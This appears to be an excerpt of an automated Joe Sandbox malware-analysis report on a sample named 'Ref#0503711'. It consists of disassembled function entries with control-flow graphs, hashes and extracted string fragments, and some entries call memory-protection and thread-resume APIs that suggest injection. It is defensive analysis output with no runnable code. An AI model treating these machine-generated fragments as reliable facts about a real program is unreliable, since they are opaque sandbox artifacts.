                                                                control_flow_graph 2192 1970f11-19710c4 2215 19710c6-19710fc 2192->2215 2216 19710fe-1971100 2192->2216 2215->2216 2217 1971106-1971110 2216->2217 2218 1971102-1971104 2216->2218 2219 1971112-197112a 2217->2219 2218->2219 2221 1971130-1971138 2219->2221 2222 197112c-197112e 2219->2222 2224 197113a-197113f 2221->2224 2222->2224 2226 1971152-1971180 2224->2226 2227 1971141-197114c 2224->2227 2231 1971182-197118f 2226->2231 2232 19711b9-19711c3 2226->2232 2227->2226 2231->2232 2237 1971191-197119e 2231->2237 2233 19711c5 2232->2233 2234 19711cc-1971253 2232->2234 2233->2234 2246 1971297-19712a5 2234->2246 2247 1971255-1971295 2234->2247 2240 19711a4-19711b3 2237->2240 2241 19711a0-19711a2 2237->2241 2240->2232 2241->2232 2250 19712b0-19712f2 call 1972db2 2246->2250 2247->2250 2254 19712f8-19713c1 2250->2254 2259 19713c3-19713ed 2254->2259 2260 19713ef-197140b 2254->2260 2259->2260 2263 197140d 2260->2263 2264 1971419 2260->2264 2263->2264 2266 197141a 2264->2266 2266->2266
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: e146c1652426e482c51180c653643b4d1dbb5c34b6618f87fd1cb0076e5b4372
                                                                • Instruction ID: fcb78183c5307893b0bd9a950d025c27bdd14057b08c962c265689abc3333108
                                                                • Opcode Fuzzy Hash: e146c1652426e482c51180c653643b4d1dbb5c34b6618f87fd1cb0076e5b4372
                                                                • Instruction Fuzzy Hash: 7CD16D35A016298FDB14CF7ADC85AAEB7F2BFC8305F158569D409EB354DB349902CB90
                                                                Function 01974D38 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: ed2b6e1d67b1ca28156ce2b836d5c6a553d911b304b7b74cfaea74cae1736f6a
                                                                • Instruction ID: 2740f377a8db1c40883cb01b36fa652b055ed3d4fec25c1991095906eadb8989
                                                                • Opcode Fuzzy Hash: ed2b6e1d67b1ca28156ce2b836d5c6a553d911b304b7b74cfaea74cae1736f6a
                                                                • Instruction Fuzzy Hash: D5710574E512199FEB08DF6AED8069ABBF3FBC8304F14D529D0089B368EB345846CB51
                                                                Function 01974D48 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: 375ec2a8b841c39ae773a16b1cf6a4285b7668ca14c5b747768d5ef0a61df254
                                                                • Instruction ID: d6076dd70563125e9a1df98f7744d4be7fc1c2be1e5513b596e0a7d5725a6827
                                                                • Opcode Fuzzy Hash: 375ec2a8b841c39ae773a16b1cf6a4285b7668ca14c5b747768d5ef0a61df254
                                                                • Instruction Fuzzy Hash: F571F474E512199FEB08DF6AED8069ABBF3FBC8304F14D529D0089B368EB345846CB51
                                                                Function 060AD760 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$h
                                                                • API String ID: 0-1849521214
                                                                • Opcode ID: bde546658d36de7ac39c45cc810023855ae7f20544e00d090c78683c3d155cad
                                                                • Instruction ID: ba4335a5c497ff0cbbbc50af5ff3203e537e7e2c90475ccc35a9399affaccbd8
                                                                • Opcode Fuzzy Hash: bde546658d36de7ac39c45cc810023855ae7f20544e00d090c78683c3d155cad
                                                                • Instruction Fuzzy Hash: 0761C671D016298BEB64CFAACC50BD9BBB2BF89300F14C2AAD40DA7254DB305A85CF51
                                                                Function 0197AE28 Relevance: 2.3, Strings: 1, Instructions: 1087COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2
                                                                • API String ID: 0-450215437
                                                                • Opcode ID: f7d74f6975e8e95624547cf17509af5edac4cdfdc784027344381812fa00df21
                                                                • Instruction ID: 197b6aab0beedfe90e5cdffd3b27d420c2b0abddf7116aa2ba043dec57797fff
                                                                • Opcode Fuzzy Hash: f7d74f6975e8e95624547cf17509af5edac4cdfdc784027344381812fa00df21
                                                                • Instruction Fuzzy Hash: B4C2AFB4E012298FDB65DF68C984A9DBBB6BF88300F1081E9D50DAB355DB309E85CF45
                                                                Function 060E0BC0 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060E0C7D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: d5b2e915e591a0c0ae56afd11c583be70e1d485d04ca7f98a1db2391a9844763
                                                                • Instruction ID: ad3c6059ad24c15ec1874396aa33ae02694c4a29a3b76cbcab361463de6492b1
                                                                • Opcode Fuzzy Hash: d5b2e915e591a0c0ae56afd11c583be70e1d485d04ca7f98a1db2391a9844763
                                                                • Instruction Fuzzy Hash: 2741A9B8D00258DFCF10CFA9D980ADEFBB5BB49310F10942AE819B7250C775A945CF69
                                                                Function 060E0BC8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060E0C7D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: 7164eae02aab372d495a2d6186a6aac3969840d2a2645ce78f3003bfca4e0ab0
                                                                • Instruction ID: 648e144a1dad3a08be5a15605d35a717f0d295d35bc4a183b5dc59fbb1f0a846
                                                                • Opcode Fuzzy Hash: 7164eae02aab372d495a2d6186a6aac3969840d2a2645ce78f3003bfca4e0ab0
                                                                • Instruction Fuzzy Hash: 0D4177B9D002589FCF10CFAAD984ADEFBB1BB49310F10942AE819B7210D775A945CF69
                                                                Function 019717B4 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 1e7c4485bcdb5f28764bad6a89b6531adb1ed8a3188a36090f94e6b378201650
                                                                • Instruction ID: f2bd33cfba17ac6c1e2f87fc682910a64001049bfeabb94d620ad35346a22f18
                                                                • Opcode Fuzzy Hash: 1e7c4485bcdb5f28764bad6a89b6531adb1ed8a3188a36090f94e6b378201650
                                                                • Instruction Fuzzy Hash: 39E15971E002298FEB15CFA9C991BADBBF2BF84301F19C1A9D458AB255D734AD81CF50
                                                                Function 060E2140 Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 060E21D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: e7c5ec31d81b5f9ae39b9461ca29df80f739e5edf7f0ed1fc0833ffedac2a946
                                                                • Instruction ID: 2abb545c4f2dac9716712eae843a5f68ae88dbbc0c0867231d75a87373fcc0b4
                                                                • Opcode Fuzzy Hash: e7c5ec31d81b5f9ae39b9461ca29df80f739e5edf7f0ed1fc0833ffedac2a946
                                                                • Instruction Fuzzy Hash: E631BBB5D012589FCB10CFA9D980ADEFBF1FB49310F10942AE859B7210C735AA45CF94
                                                                Function 060E2148 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 060E21D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 34555ce371b095eb8f3815c320bba8d9d05c4dfb03c2749bb193d54215ade373
                                                                • Instruction ID: 69b6d7d82c82012dbb2a77a2375fb1b3b8f58be51467ce24ba1c3c49ded2f16b
                                                                • Opcode Fuzzy Hash: 34555ce371b095eb8f3815c320bba8d9d05c4dfb03c2749bb193d54215ade373
                                                                • Instruction Fuzzy Hash: 8031A8B5D012589FCB10CFA9D984ADEFBF5BB49310F20942AE818B7210C775AA45CF94
                                                                Function 060A9188 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: a7ff084cb7e3be3ec80d7c7266da84ac5b28d86ee12e65821e2087a573e7c4be
                                                                • Instruction ID: b7a1cb18b234c7dba807092cab0f9da9df3756fa7f2e0368d42f67200a6579e3
                                                                • Opcode Fuzzy Hash: a7ff084cb7e3be3ec80d7c7266da84ac5b28d86ee12e65821e2087a573e7c4be
                                                                • Instruction Fuzzy Hash: 84D1D674E95318CFEB94CFA9D484BADBBF2BB89345F2080AAD409A7251D7745D84CF40
                                                                Function 060A9179 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: c9bc64171ef42f8afb596dd48dcc085740bbcfe2c1c85e364fef5d0dea1e89f8
                                                                • Instruction ID: 51bb702ea1fcf64c8df0797ad853a116faeeae62a5593d6984610c36f418dce4
                                                                • Opcode Fuzzy Hash: c9bc64171ef42f8afb596dd48dcc085740bbcfe2c1c85e364fef5d0dea1e89f8
                                                                • Instruction Fuzzy Hash: 27D1E574E95218CFEBA4CFA9D884B9DBBF2FB89345F2080AAD409A7251D7745D84CF40
                                                                Function 060B0006 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q
                                                                • API String ID: 0-671973202
                                                                • Opcode ID: e81be1dc6218acd6f7e409967571006ae8dcf3da061a010b5572c5074c32735b
                                                                • Instruction ID: 397baecc8c4667844ef89a0e7f69209ce0d4ef4cc99a657525083af597177f08
                                                                • Opcode Fuzzy Hash: e81be1dc6218acd6f7e409967571006ae8dcf3da061a010b5572c5074c32735b
                                                                • Instruction Fuzzy Hash: E5C1D274E41208CFEBA4CFA9C894BDEBBF2AB89304F14D0AAD449A7255D7345D85CF44
                                                                Function 060B0040 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q
                                                                • API String ID: 0-671973202
                                                                • Opcode ID: 4a5920fbb64fdb0024cb7e98063bb2fd290cd068e655c196c118abf51bcb49fd
                                                                • Instruction ID: 48cfd19a71a9b241f71202fa702a2f1b41dcd8d0d2b1dfb44487c6474093c682
                                                                • Opcode Fuzzy Hash: 4a5920fbb64fdb0024cb7e98063bb2fd290cd068e655c196c118abf51bcb49fd
                                                                • Instruction Fuzzy Hash: AAB1A174E41218CFEB94CFA9C894BDEBBF2AB89304F10E0AAD40AA7255D7745D85CF44
                                                                Function 060A95D6 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: f6ababcca40d7d884429e45daa9570e710d80698cdb2e24ccf61a49cf4eefefb
                                                                • Instruction ID: 9ce5052274328f77216c93e0488f6f6c06f25959d04ec6da6f84d1aabf1c37c5
                                                                • Opcode Fuzzy Hash: f6ababcca40d7d884429e45daa9570e710d80698cdb2e24ccf61a49cf4eefefb
                                                                • Instruction Fuzzy Hash: BFB1F474E95219CFEBA4CFA8D488B9DBBF1FB49345F2080AAD409A7261D7749D84CF40
                                                                Function 01970B88 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 00fd104556ec4ee859f07f0474f43496488704cfdd0f0aa059744dba7771da9b
                                                                • Instruction ID: 2bd5529b2894992e95393bfb978a52a6118ec88d51cbcb797ce76643158d89e2
                                                                • Opcode Fuzzy Hash: 00fd104556ec4ee859f07f0474f43496488704cfdd0f0aa059744dba7771da9b
                                                                • Instruction Fuzzy Hash: CD812A78E4020E9FDF14CFA9D9809AEBBB1FF88301F14A659D416EB294DB31A941CF50
                                                                Function 0197C224 Relevance: .5, Instructions: 471COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e5b5b5ad1d4cdc176aef7e8ed2dbde14c188e008bac2232290700d4676bfbfd8
                                                                • Instruction ID: 92bc78c494a37953ea0328026e697e1e328680dc225f7155e81cf671fed21a07
                                                                • Opcode Fuzzy Hash: e5b5b5ad1d4cdc176aef7e8ed2dbde14c188e008bac2232290700d4676bfbfd8
                                                                • Instruction Fuzzy Hash: 1E32C374A0422ACFCB65DF28C984A99BBB6FF48300F1085E9E54DA7355DB30AE81CF54
                                                                Function 060E9818 Relevance: .3, Instructions: 319COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fa3dbed6dc5e095a2f27256519c04d9c928782f1e83e1670708001ee9183f11
                                                                • Instruction ID: 43fcc1a0e8dbaf9a1ec9a217cc7ec0d8f34a054d0c55387dcd86f77aa69ccff8
                                                                • Opcode Fuzzy Hash: 4fa3dbed6dc5e095a2f27256519c04d9c928782f1e83e1670708001ee9183f11
                                                                • Instruction Fuzzy Hash: 36E1C574A85229CFDBA4CF19C994BDDBBF2EB89304F1080EAD509A7250DB745E85CF44
                                                                Function 060E6C08 Relevance: .3, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f00cf1e1813037db58031f54f897ce4b560d68d1adc83dac589cc724a89303b
                                                                • Instruction ID: 0b2cd04ab75692fec3951480ea57ae7e2e945c99352ddad6c64363286f35308a
                                                                • Opcode Fuzzy Hash: 6f00cf1e1813037db58031f54f897ce4b560d68d1adc83dac589cc724a89303b
                                                                • Instruction Fuzzy Hash: 98C1E374E56228CFEB94CF68D850BADBBB2FB89300F1081AAD409A7350DB755D84CF51
                                                                Function 060EC370 Relevance: .2, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4928e7e19a054056884242b749ea872c601719e654ea79226c1db13ec7e5649d
                                                                • Instruction ID: ac4103acf71139ff434fd5e7c6575076cc66439ab3ae0c269c4b1cf4b9c5182c
                                                                • Opcode Fuzzy Hash: 4928e7e19a054056884242b749ea872c601719e654ea79226c1db13ec7e5649d
                                                                • Instruction Fuzzy Hash: 89B103B4D41228CFEB94CFA8D884BADBBF2FB89304F50906AE419AB251D7755885CF40
                                                                Function 060EC380 Relevance: .2, Instructions: 240COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b205eb30ea73ea6b8c567731be6816ea9c9598c017b9bcfe2213ab72bdd8f216
                                                                • Instruction ID: 5160e1ade9e723127f6418befd13cf6fb375de2e9c00430a99d9aec4035649f0
                                                                • Opcode Fuzzy Hash: b205eb30ea73ea6b8c567731be6816ea9c9598c017b9bcfe2213ab72bdd8f216
                                                                • Instruction Fuzzy Hash: 86A1F5B0D41228CFEB94CFA9D884BADBBF2FF89304F50916AD419AB251DB755885CF40
                                                                Function 01972DB2 Relevance: .2, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bed447fa5ca7ef026ec0ae0a0da1df4bcd748e0b454fdc99c9a41f4dcbdd2d5
                                                                • Instruction ID: 7981dfb1b81f0e47a81291116508299b89457ac77d298c8384c0e6cd1a978452
                                                                • Opcode Fuzzy Hash: 6bed447fa5ca7ef026ec0ae0a0da1df4bcd748e0b454fdc99c9a41f4dcbdd2d5
                                                                • Instruction Fuzzy Hash: CE817F32F205158FD715DB69DC84A5EB7F3AFC8711F1A8169E40ADB365DA35EC028B80
                                                                Function 060BA730 Relevance: 7.9, Strings: 6, Instructions: 406COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 636 60ba730-60ba77c 640 60ba8fa-60ba966 636->640 641 60ba782-60ba794 636->641 654 60ba96c-60ba975 640->654 655 60babb5-60babbc 640->655 644 60ba796-60ba7e2 641->644 645 60ba7e4-60ba82d 641->645 677 60ba830-60ba844 644->677 645->677 657 60ba9eb-60baa04 654->657 658 60ba977-60ba97b 654->658 669 60baa0a 657->669 670 60bab31-60bab41 657->670 660 60ba97d-60ba992 658->660 661 60ba994-60ba9a0 658->661 663 60ba9a9-60ba9e6 660->663 661->663 663->655 673 60baa59-60baa9c 669->673 674 60baae9-60bab2c 669->674 675 60baa11-60baa54 669->675 676 60baaa1-60baae4 669->676 679 60bab5a-60bab66 670->679 680 60bab43-60bab58 670->680 673->655 674->655 675->655 676->655 683 60ba84f-60ba870 677->683 686 60bab6f-60babb0 679->686 680->686 691 60ba87a-60ba884 683->691 692 60ba872-60ba878 683->692 686->655 693 60ba887-60ba8ca 691->693 692->693 700 60ba8cc-60ba8e8 693->700 701 60ba8f0-60ba8f7 693->701 700->701
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                • API String ID: 0-723292480
                                                                • Opcode ID: e1ad797627ea26cd6048c9201ce05270f146e54a8e838ee93e710fbcd6507f21
                                                                • Instruction ID: 06ed185b108d7f3bc64ea6a9dbcc1d17711b095978ef1e70db28e2031ba8772a
                                                                • Opcode Fuzzy Hash: e1ad797627ea26cd6048c9201ce05270f146e54a8e838ee93e710fbcd6507f21
                                                                • Instruction Fuzzy Hash: 48D14F32A40119DFCB45CF64C944D99BBB3FF88310B0584E8D609AB276DB32ED56DB90
                                                                Function 019721B0 Relevance: 5.4, Strings: 4, Instructions: 361COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 875 19721b0-1972211 879 1972213-1972217 875->879 880 197221d-1972231 875->880 879->880 882 197223f-197224a 880->882 884 1972233-1972236 882->884 884->882 885 1972238 884->885 885->882 886 1972337 885->886 887 1972275-197227a 885->887 888 19724b4-19724cd 885->888 889 1972291-19722ac 885->889 890 19725de-19725f9 call 19701c8 885->890 891 197227c-197228f 885->891 892 197231b-1972332 885->892 893 19725fb-1972606 885->893 894 1972263-1972273 885->894 895 1972302-1972316 885->895 896 19724a2-19724b2 885->896 897 19722c0-19722c3 885->897 898 19722ae-19722b0 885->898 899 197248e-1972495 885->899 900 197224c-1972261 885->900 901 1972608-197261f 885->901 904 1972338-197233b 886->904 887->884 917 19724d3 888->917 918 19724cf-19724d1 888->918 889->884 902 19725c5-19725c8 890->902 891->884 892->884 893->902 894->884 895->884 926 1972467-197246a 896->926 905 197266d-19726d9 897->905 906 19722c9-19722dc 897->906 903 19722b6-19722bb 898->903 898->904 913 197249b-19724a0 899->913 900->884 901->902 920 19725d1-19725dc 902->920 921 19725ca 902->921 903->884 904->897 916 197233d-197238c call 19701b8 904->916 934 197271e 905->934 935 19726db 905->935 906->905 911 19722e2-19722ee 906->911 911->905 925 19722f4-19722fd 911->925 913->926 959 197238e-1972392 916->959 960 1972398-1972407 916->960 928 19724d8-19724da 917->928 918->928 920->902 921->890 921->893 921->901 921->920 929 1972653-197266c 921->929 925->884 931 197245c 926->931 932 197246c 926->932 937 19724e5 928->937 938 19724dc 928->938 931->926 932->888 932->890 932->893 932->896 932->899 932->901 932->929 940 1972473-1972487 932->940 952 1972721-1972722 934->952 935->934 942 1972717-197271c 935->942 943 19726e6-19726eb 935->943 944 19726f4-19726f9 935->944 945 1972702-1972707 935->945 946 19726e2-19726e4 935->946 947 1972710-1972715 935->947 948 19726ed-19726f2 935->948 949 19726fb-1972700 935->949 950 1972709-197270e 935->950 937->902 938->937 940->899 942->952 943->952 944->952 945->952 946->952 947->952 948->952 949->952 950->952 959->960 969 197241e-1972431 960->969 970 1972409-197241c 960->970 975 1972433-1972438 969->975 976 197243a 969->976 973 1972453 970->973 981 1972453 call 1972770 973->981 982 1972453 call 1972760 973->982 978 197243c-197243e 975->978 976->978 977 1972459 977->931 978->940 979 1972440-1972451 978->979 979->973 981->977 982->977
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$TJcq$TJcq$Te^q
                                                                • API String ID: 0-2400496369
                                                                • Opcode ID: cf96dfb3dc09b405c91fb0baab6b9f0ef04669afb278b35fce4e816ed3b4a385
                                                                • Instruction ID: 126079bdc01e3af10ac359c21a19b9b5dc78635ebc06e0b63dab20b29d0217ba
                                                                • Opcode Fuzzy Hash: cf96dfb3dc09b405c91fb0baab6b9f0ef04669afb278b35fce4e816ed3b4a385
                                                                • Instruction Fuzzy Hash: D5E15A34B142058FD705CFA8D894B6DBBB2FF89710F254469E50A9B3A6CB34EC45CB51
                                                                Function 06210C10 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 983 6210c10-6210c17 984 6210c1d-6210c3f 983->984 985 621011c-6210158 983->985 986 6210c45-6210c50 984->986 987 6210104-621010d 984->987 997 621015b call 60e2148 985->997 998 621015b call 60e2140 985->998 986->987 988 6210116-6210117 987->988 989 621010f 987->989 991 62104c5-62104e3 988->991 989->991 992 62104ee-621071f 989->992 991->987 992->987 996 621015d-6210177 996->987 996->991 997->996 998->996
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$2$C$D
                                                                • API String ID: 0-4180688742
                                                                • Opcode ID: f99a39d8b60d81f5618b7ec889506228a91224c58a04b63dad7f39005a74d957
                                                                • Instruction ID: fbaef8a4b51fb5eee14df7ddaa996406c1fb3886e307108d10ea0a205b9125ba
                                                                • Opcode Fuzzy Hash: f99a39d8b60d81f5618b7ec889506228a91224c58a04b63dad7f39005a74d957
                                                                • Instruction Fuzzy Hash: 6021E2B4958268CFEBA0CF14D884BECB7F5AB15304F1094DAC40AAB244CB799EC9CF15
